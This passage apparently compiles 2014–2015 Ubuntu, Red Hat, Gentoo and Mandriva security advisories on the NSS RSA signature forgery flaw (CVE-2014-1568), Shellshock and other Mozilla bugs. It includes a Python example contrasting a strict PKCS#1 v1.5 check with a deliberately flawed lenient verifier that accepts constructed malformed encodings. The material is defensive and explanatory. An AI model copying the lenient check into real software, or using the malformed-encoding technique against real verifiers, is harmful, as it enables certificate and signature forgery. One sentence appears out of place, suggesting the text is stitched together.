vulnerability is a variant of the Bleichenbacher vulnerability announced in 2006 (http://www.imc.org/ietf-openpgp/mail-archive/msg06063.html). Mozilla NSS is used in multiple Linux distributions and packages, and in Google Chrome and Google Chrome OS, among others. Other libraries and products may have similar vulnerable implementations. RSA signatures, such as those on SSL certificates, may be forged.
============================================================================
Ubuntu Security Notice USN-2360-2
September 24, 2014
thunderbird vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Fraudulent security certificates could allow sensitive information to
be exposed when accessing the Internet. This update provides the
corresponding updates for Thunderbird.
Original advisory details:
Antoine Delignat-Lavaud and others discovered that NSS incorrectly handled
parsing ASN.1 values.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.04 LTS:
thunderbird 1:31.1.2+build1-0ubuntu0.14.04.1
Ubuntu 12.04 LTS:
thunderbird 1:31.1.2+build1-0ubuntu0.12.04.1
After a standard system update you need to restart Thunderbird to make
all the necessary changes.
He discovered that NSS is vulnerable
to a variant of a signature forgery attack previously published
by Daniel Bleichenbacher. This is due to lenient parsing of ASN.1
values involved in a signature and could lead to the forging of RSA
certificates (CVE-2014-1568).
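The lenient ASN.1 parsing described above is avoided by never parsing the decoded block at all: the verifier re-encodes the expected PKCS#1 v1.5 block and compares bytes. The following is an added example, not NSS code or any vendor's; `lenient_check` is a hypothetical parse-based check written for contrast, the inputs are constructed encoded messages (the value a verifier holds after the RSA public-key operation, so no key or signature is involved), and SHA-256 with a 256-byte modulus is an assumption.

```python
"""Strict vs. lenient checking of a PKCS#1 v1.5 encoded message (EM)."""
import hashlib
import hmac

# DER prefix of DigestInfo for SHA-256 (RFC 8017, section 9.2, note 1).
SHA256_DIGESTINFO_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")


def expected_em(message, em_len):
    """Build the single valid EM for `message` (EMSA-PKCS1-v1_5)."""
    t = SHA256_DIGESTINFO_PREFIX + hashlib.sha256(message).digest()
    if em_len < len(t) + 11:
        raise ValueError("modulus too short for this digest")
    return b"\x00\x01" + b"\xff" * (em_len - len(t) - 3) + b"\x00" + t


def strict_check(em, message):
    """Accept only a byte-for-byte match with the re-encoded EM."""
    try:
        return hmac.compare_digest(em, expected_em(message, len(em)))
    except ValueError:
        return False


def _read_tlv(buf, pos):
    """Minimal BER reader returning (tag, value, next_pos). It accepts
    long-form lengths, including non-minimal ones that DER forbids."""
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:
        n = first & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    else:
        length = first
    return tag, buf[pos:pos + length], pos + length


def lenient_check(em, message):
    """Hypothetical parse-based check showing the flawed pattern."""
    if em[:2] != b"\x00\x01":
        return False
    sep = em.find(b"\x00", 2)              # no minimum padding length
    if sep < 0 or set(em[2:sep]) - {0xFF}:
        return False
    try:
        _, digest_info, _ = _read_tlv(em, sep + 1)    # trailing bytes ignored
        _, _alg, pos = _read_tlv(digest_info, 0)      # algorithm not compared
        tag, digest, _ = _read_tlv(digest_info, pos)
    except IndexError:
        return False
    return tag == 0x04 and digest == hashlib.sha256(message).digest()


def constructed_samples(message, em_len=256):
    """Three constructed EMs: one valid, two malformed encodings."""
    digest = hashlib.sha256(message).digest()
    t = SHA256_DIGESTINFO_PREFIX + digest
    # Eight padding bytes only, with filler after the DigestInfo.
    short_pad = (b"\x00\x01" + b"\xff" * 8 + b"\x00" + t).ljust(em_len, b"\xaa")
    # Same fields, but the OCTET STRING length is BER long form (81 20).
    t_ber = b"\x30\x32" + SHA256_DIGESTINFO_PREFIX[2:-2] + b"\x04\x81\x20" + digest
    ber_len = b"\x00\x01" + b"\xff" * (em_len - len(t_ber) - 3) + b"\x00" + t_ber
    return {
        "well-formed": expected_em(message, em_len),
        "short padding + trailing bytes": short_pad,
        "BER long-form length": ber_len,
    }


def verdicts(message, em_len=256):
    """Return {sample name: (lenient result, strict result)}."""
    return {name: (lenient_check(em, message), strict_check(em, message))
            for name, em in constructed_samples(message, em_len).items()}


if __name__ == "__main__":
    for name, (lenient, strict) in verdicts(b"constructed sample message").items():
        print(f"{name:32s} lenient={lenient!s:5s} strict={strict}")
```

Both malformed samples pass the parse-based check and fail the comparison, which is why re-encoding is the recommended way to verify this padding scheme.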
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: rhev-hypervisor6 security update
Advisory ID: RHSA-2014:1354-01
Product: Red Hat Enterprise Virtualization
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1354.html
Issue date: 2014-10-02
CVE Names: CVE-2014-1568 CVE-2014-6271 CVE-2014-7169
CVE-2014-7186 CVE-2014-7187
=====================================================================
1. Summary:
An updated rhev-hypervisor6 package that fixes several security issues is
now available.
Red Hat Product Security has rated this update as having Critical security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
RHEV-M 3.4 - noarch
3. Description:
The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization
Hypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor
is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes
everything necessary to run and manage virtual machines: a subset of the
Red Hat Enterprise Linux operating environment and the Red Hat Enterprise
Virtualization Agent.
Note: Red Hat Enterprise Virtualization Hypervisor is only available for
the Intel 64 and AMD64 architectures with virtualization extensions.
A flaw was found in the way Bash evaluated certain specially crafted
environment variables. An attacker could use this flaw to override or
bypass environment restrictions to execute shell commands. Certain services
and applications allow remote unauthenticated attackers to provide
environment variables, allowing them to exploit this issue. (CVE-2014-6271)
It was found that the fix for CVE-2014-6271 was incomplete, and Bash still
allowed certain characters to be injected into other environments via
specially crafted environment variables. An attacker could potentially use
this flaw to override or bypass environment restrictions to execute shell
commands. Certain services and applications allow remote unauthenticated
attackers to provide environment variables, allowing them to exploit this
issue. (CVE-2014-7169)
A flaw was found in the way NSS parsed ASN.1 (Abstract Syntax Notation One)
input from certain RSA signatures. (CVE-2014-1568)
It was discovered that the fixed-sized redir_stack could be forced to
overflow in the Bash parser, resulting in memory corruption, and possibly
leading to arbitrary code execution when evaluating untrusted input that
would not otherwise be run as code. (CVE-2014-7186)
An off-by-one error was discovered in the way Bash was handling deeply
nested flow control constructs. Depending on the layout of the .bss
segment, this could allow arbitrary execution of code that would not
otherwise be executed by Bash. (CVE-2014-7187)
Red Hat would like to thank Stephane Chazelas for reporting CVE-2014-6271,
and the Mozilla project for reporting CVE-2014-1568. Upstream acknowledges
Antoine Delignat-Lavaud and Intel Product Security Incident Response Team
as the original reporters of CVE-2014-1568. The CVE-2014-7186 and
CVE-2014-7187 issues were discovered by Florian Weimer of Red Hat Product
Security.
Users of the Red Hat Enterprise Virtualization Hypervisor are advised to
upgrade to this updated package.
4. Solution:
This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
To upgrade Hypervisors in Red Hat Enterprise Virtualization environments
using the disk image provided by this package, refer to:
https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html/Hypervisor_Deployment_Guide/chap-Deployment_Guide-Upgrading_Red_Hat_Enterprise_Virtualization_Hypervisors.html
5. Bugs fixed (https://bugzilla.redhat.com/):
1141597 - CVE-2014-6271 bash: specially-crafted environment variables can be used to inject shell commands
1145429 - CVE-2014-1568 nss: RSA PKCS#1 signature verification forgery flaw (MFSA 2014-73)
1146319 - CVE-2014-7169 bash: code execution via specially-crafted environment (Incomplete fix for CVE-2014-6271)
1146791 - CVE-2014-7186 bash: parser can allow out-of-bounds memory access while handling redir_stack
1146804 - CVE-2014-7187 bash: off-by-one error in deeply nested flow control constructs
6. Package List:
RHEV-M 3.4:
Source:
rhev-hypervisor6-6.5-20140930.1.el6ev.src.rpm
noarch:
rhev-hypervisor6-6.5-20140930.1.el6ev.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2014-1568.html
https://www.redhat.com/security/data/cve/CVE-2014-6271.html
https://www.redhat.com/security/data/cve/CVE-2014-7169.html
https://www.redhat.com/security/data/cve/CVE-2014-7186.html
https://www.redhat.com/security/data/cve/CVE-2014-7187.html
https://access.redhat.com/security/updates/classification/#critical
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201504-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Mozilla Products: Multiple vulnerabilities
Date: April 07, 2015
Bugs: #489796, #491234, #493850, #500320, #505072, #509050,
#512896, #517876, #522020, #523652, #525474, #531408,
#536564, #541316, #544056
ID: 201504-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in Mozilla Firefox,
Thunderbird, and SeaMonkey, the worst of which may allow user-assisted
execution of arbitrary code.
Background
==========
Mozilla Firefox is an open-source web browser and Mozilla Thunderbird
an open-source email client, both from the Mozilla Project. The
SeaMonkey project is a community effort to deliver production-quality
releases of code derived from the application formerly known as the
‘Mozilla Application Suite’.
Affected packages
=================
-------------------------------------------------------------------
     Package                      /  Vulnerable  /       Unaffected
-------------------------------------------------------------------
  1  www-client/firefox              < 31.5.3            >= 31.5.3
  2  www-client/firefox-bin          < 31.5.3            >= 31.5.3
  3  mail-client/thunderbird         < 31.5.0            >= 31.5.0
  4  mail-client/thunderbird-bin     < 31.5.0            >= 31.5.0
  5  www-client/seamonkey            < 2.33.1            >= 2.33.1
  6  www-client/seamonkey-bin        < 2.33.1            >= 2.33.1
  7  dev-libs/nspr                   < 4.10.6            >= 4.10.6
-------------------------------------------------------------------
7 affected packages
Description
===========
Multiple vulnerabilities have been discovered in Firefox, Thunderbird,
and SeaMonkey. Please review the CVE identifiers referenced below for
details.
Impact
======
A remote attacker could entice a user to view a specially crafted web
page or email, possibly resulting in execution of arbitrary code or a
Denial of Service condition. Furthermore, a remote attacker may be able
to perform Man-in-the-Middle attacks, obtain sensitive information,
spoof the address bar, conduct clickjacking attacks, bypass security
restrictions and protection mechanisms, or have other unspecified
impact.
Workaround
==========
There are no known workarounds at this time.
Resolution
==========
All firefox users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-client/firefox-31.5.3"
All firefox-bin users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-client/firefox-bin-31.5.3"
All thunderbird users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=mail-client/thunderbird-31.5.0"
All thunderbird-bin users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=mail-client/thunderbird-bin-31.5.0"
All seamonkey users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-client/seamonkey-2.33.1"
All seamonkey-bin users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-client/seamonkey-bin-2.33.1"
All nspr users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-libs/nspr-4.10.6"
References
==========
[ 1 ] CVE-2013-1741
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1741
[ 2 ] CVE-2013-2566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2566
[ 3 ] CVE-2013-5590
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5590
[ 4 ] CVE-2013-5591
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5591
[ 5 ] CVE-2013-5592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5592
[ 6 ] CVE-2013-5593
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5593
[ 7 ] CVE-2013-5595
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5595
[ 8 ] CVE-2013-5596
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5596
[ 9 ] CVE-2013-5597
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5597
[ 10 ] CVE-2013-5598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5598
[ 11 ] CVE-2013-5599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5599
[ 12 ] CVE-2013-5600
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5600
[ 13 ] CVE-2013-5601
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5601
[ 14 ] CVE-2013-5602
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5602
[ 15 ] CVE-2013-5603
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5603
[ 16 ] CVE-2013-5604
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5604
[ 17 ] CVE-2013-5605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5605
[ 18 ] CVE-2013-5606
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5606
[ 19 ] CVE-2013-5607
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5607
[ 20 ] CVE-2013-5609
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5609
[ 21 ] CVE-2013-5610
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5610
[ 22 ] CVE-2013-5612
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5612
[ 23 ] CVE-2013-5613
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5613
[ 24 ] CVE-2013-5614
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5614
[ 25 ] CVE-2013-5615
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5615
[ 26 ] CVE-2013-5616
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5616
[ 27 ] CVE-2013-5618
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5618
[ 28 ] CVE-2013-5619
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5619
[ 29 ] CVE-2013-6671
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6671
[ 30 ] CVE-2013-6672
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6672
[ 31 ] CVE-2013-6673
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6673
[ 32 ] CVE-2014-1477
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1477
[ 33 ] CVE-2014-1478
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1478
[ 34 ] CVE-2014-1479
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1479
[ 35 ] CVE-2014-1480
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1480
[ 36 ] CVE-2014-1481
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1481
[ 37 ] CVE-2014-1482
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1482
[ 38 ] CVE-2014-1483
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1483
[ 39 ] CVE-2014-1485
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1485
[ 40 ] CVE-2014-1486
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1486
[ 41 ] CVE-2014-1487
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1487
[ 42 ] CVE-2014-1488
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1488
[ 43 ] CVE-2014-1489
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1489
[ 44 ] CVE-2014-1490
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1490
[ 45 ] CVE-2014-1491
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1491
[ 46 ] CVE-2014-1492
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1492
[ 47 ] CVE-2014-1493
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1493
[ 48 ] CVE-2014-1494
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1494
[ 49 ] CVE-2014-1496
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1496
[ 50 ] CVE-2014-1497
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1497
[ 51 ] CVE-2014-1498
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1498
[ 52 ] CVE-2014-1499
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1499
[ 53 ] CVE-2014-1500
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1500
[ 54 ] CVE-2014-1502
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1502
[ 55 ] CVE-2014-1505
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1505
[ 56 ] CVE-2014-1508
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1508
[ 57 ] CVE-2014-1509
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1509
[ 58 ] CVE-2014-1510
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1510
[ 59 ] CVE-2014-1511
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1511
[ 60 ] CVE-2014-1512
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1512
[ 61 ] CVE-2014-1513
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1513
[ 62 ] CVE-2014-1514
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1514
[ 63 ] CVE-2014-1518
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1518
[ 64 ] CVE-2014-1519
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1519
[ 65 ] CVE-2014-1520
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1520
[ 66 ] CVE-2014-1522
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1522
[ 67 ] CVE-2014-1523
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1523
[ 68 ] CVE-2014-1524
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1524
[ 69 ] CVE-2014-1525
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1525
[ 70 ] CVE-2014-1526
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1526
[ 71 ] CVE-2014-1529
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1529
[ 72 ] CVE-2014-1530
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1530
[ 73 ] CVE-2014-1531
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1531
[ 74 ] CVE-2014-1532
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1532
[ 75 ] CVE-2014-1533
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1533
[ 76 ] CVE-2014-1534
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1534
[ 77 ] CVE-2014-1536
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1536
[ 78 ] CVE-2014-1537
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1537
[ 79 ] CVE-2014-1538
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1538
[ 80 ] CVE-2014-1539
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1539
[ 81 ] CVE-2014-1540
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1540
[ 82 ] CVE-2014-1541
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1541
[ 83 ] CVE-2014-1542
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1542
[ 84 ] CVE-2014-1543
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1543
[ 85 ] CVE-2014-1544
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1544
[ 86 ] CVE-2014-1545
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1545
[ 87 ] CVE-2014-1547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1547
[ 88 ] CVE-2014-1548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1548
[ 89 ] CVE-2014-1549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1549
[ 90 ] CVE-2014-1550
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1550
[ 91 ] CVE-2014-1551
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1551
[ 92 ] CVE-2014-1552
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1552
[ 93 ] CVE-2014-1553
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1553
[ 94 ] CVE-2014-1554
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1554
[ 95 ] CVE-2014-1555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1555
[ 96 ] CVE-2014-1556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1556
[ 97 ] CVE-2014-1557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1557
[ 98 ] CVE-2014-1558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1558
[ 99 ] CVE-2014-1559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1559
[ 100 ] CVE-2014-1560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1560
[ 101 ] CVE-2014-1561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1561
[ 102 ] CVE-2014-1562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1562
[ 103 ] CVE-2014-1563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1563
[ 104 ] CVE-2014-1564
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1564
[ 105 ] CVE-2014-1565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1565
[ 106 ] CVE-2014-1566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1566
[ 107 ] CVE-2014-1567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1567
[ 108 ] CVE-2014-1568
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1568
[ 109 ] CVE-2014-1574
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1574
[ 110 ] CVE-2014-1575
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1575
[ 111 ] CVE-2014-1576
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1576
[ 112 ] CVE-2014-1577
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1577
[ 113 ] CVE-2014-1578
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1578
[ 114 ] CVE-2014-1580
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1580
[ 115 ] CVE-2014-1581
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1581
[ 116 ] CVE-2014-1582
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1582
[ 117 ] CVE-2014-1583
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1583
[ 118 ] CVE-2014-1584
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1584
[ 119 ] CVE-2014-1585
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1585
[ 120 ] CVE-2014-1586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1586
[ 121 ] CVE-2014-1587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1587
[ 122 ] CVE-2014-1588
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1588
[ 123 ] CVE-2014-1589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1589
[ 124 ] CVE-2014-1590
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1590
[ 125 ] CVE-2014-1591
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1591
[ 126 ] CVE-2014-1592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1592
[ 127 ] CVE-2014-1593
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1593
[ 128 ] CVE-2014-1594
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1594
[ 129 ] CVE-2014-5369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-5369
[ 130 ] CVE-2014-8631
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8631
[ 131 ] CVE-2014-8632
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8632
[ 132 ] CVE-2014-8634
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8634
[ 133 ] CVE-2014-8635
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8635
[ 134 ] CVE-2014-8636
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8636
[ 135 ] CVE-2014-8637
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8637
[ 136 ] CVE-2014-8638
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8638
[ 137 ] CVE-2014-8639
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8639
[ 138 ] CVE-2014-8640
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8640
[ 139 ] CVE-2014-8641
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8641
[ 140 ] CVE-2014-8642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8642
[ 141 ] CVE-2015-0817
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0817
[ 142 ] CVE-2015-0818
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0818
[ 143 ] CVE-2015-0819
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0819
[ 144 ] CVE-2015-0820
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0820
[ 145 ] CVE-2015-0821
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0821
[ 146 ] CVE-2015-0822
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0822
[ 147 ] CVE-2015-0823
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0823
[ 148 ] CVE-2015-0824
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0824
[ 149 ] CVE-2015-0825
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0825
[ 150 ] CVE-2015-0826
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0826
[ 151 ] CVE-2015-0827
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0827
[ 152 ] CVE-2015-0828
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0828
[ 153 ] CVE-2015-0829
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0829
[ 154 ] CVE-2015-0830
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0830
[ 155 ] CVE-2015-0831
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0831
[ 156 ] CVE-2015-0832
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0832
[ 157 ] CVE-2015-0833
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0833
[ 158 ] CVE-2015-0834
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0834
[ 159 ] CVE-2015-0835
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0835
[ 160 ] CVE-2015-0836
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0836
[ 161 ] CVE-2014-1504
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201504-01
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2015 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
.
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2015:059
http://www.mandriva.com/en/support/security/
_______________________________________________________________________
Package : nss
Date : March 13, 2015
Affected: Business Server 2.0
_______________________________________________________________________
Problem Description:
Multiple vulnerabilities have been found and corrected in the Mozilla
NSS and NSPR packages:
The cert_TestHostName function in lib/certdb/certdb.c in the
certificate-checking implementation in Mozilla Network Security
Services (NSS) before 3.16 accepts a wildcard character that is
embedded in an internationalized domain name's U-label, which might
allow man-in-the-middle attackers to spoof SSL servers via a crafted
certificate (CVE-2014-1492).
Use-after-free vulnerability in the CERT_DestroyCertificate function
in libnss3.so in Mozilla Network Security Services (NSS) 3.x, as used
in Firefox before 31.0, Firefox ESR 24.x before 24.7, and Thunderbird
before 24.7, allows remote attackers to execute arbitrary code via
vectors that trigger certain improper removal of an NSSCertificate
structure from a trust domain (CVE-2014-1544).
The definite_length_decoder function in lib/util/quickder.c in
Mozilla Network Security Services (NSS) before 3.16.2.4 and 3.17.x
before 3.17.3 does not ensure that the DER encoding of an ASN.1
length is properly formed, which allows remote attackers to conduct
data-smuggling attacks by using a long byte sequence for an encoding,
as demonstrated by the SEC_QuickDERDecodeItem function's improper
handling of an arbitrary-length encoding of 0x00 (CVE-2014-1569).
Mozilla Netscape Portable Runtime (NSPR) before 4.10.6 allows remote
attackers to execute arbitrary code or cause a denial of service
(out-of-bounds write) via vectors involving the sprintf and console
functions (CVE-2014-1545).
The sqlite3 packages have been upgraded to the 3.8.6 version due to
